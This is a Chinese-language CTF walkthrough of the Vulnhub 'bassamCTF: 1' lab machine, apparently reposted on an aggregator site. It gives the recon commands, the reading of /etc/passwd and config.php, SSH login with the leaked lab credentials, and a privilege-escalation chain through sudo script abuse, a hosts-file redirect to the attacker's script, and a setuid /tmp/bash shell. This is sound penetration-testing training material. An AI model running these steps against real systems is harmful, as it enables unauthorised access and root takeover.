kali:192.168.111.111
靶机:192.168.111.210
信息收集
端口扫描
nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.210
修改hosts文件
爆破出子域名welcome
wfuzz -H 'HOST: FUZZ.bassam.ctf' -u http://192.168.111.210 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --hh 422,21 -c
对子域目录爆破
gobuster dir -u http://welcome.bassam.ctf/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,bak,txt,html,sql,zip,phtml,sh,pcapng,pcap,conf
index.php
存在文件读取
查看/etc/passwd
和config.php
用config.php
中的账号密码登录ssh,账号:test
,密码:test123
提权
查看test用户的历史命令发现文件MySecretPassword
find / -name 'MySecretPassword' 2> /dev/null
MySecretPassword
文件内容
xxd MySecretPassword
利用/PassProgram
目录中的decoder程序进行解密,得到kira用户密码:kira2003
./decoder /var/www/ctf/MySecretPassword
kira用户sudo权限
脚本内容
执行脚本的之时给脚本传入变量执行bash解释器
sudo -u bassam /home/kira/test.sh /bin/bash
bassam用户sudo权限
脚本内容
在kali创建script.sh脚本文件,写入提权命令,再修改靶机的hosts文件指向kali
提升为root文章来源:https://www.toymoban.com/news/detail-667086.html
/tmp/bash -p
文章来源地址https://www.toymoban.com/news/detail-667086.html
到了这里,关于Vulnhub: bassamCTF: 1靶机的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!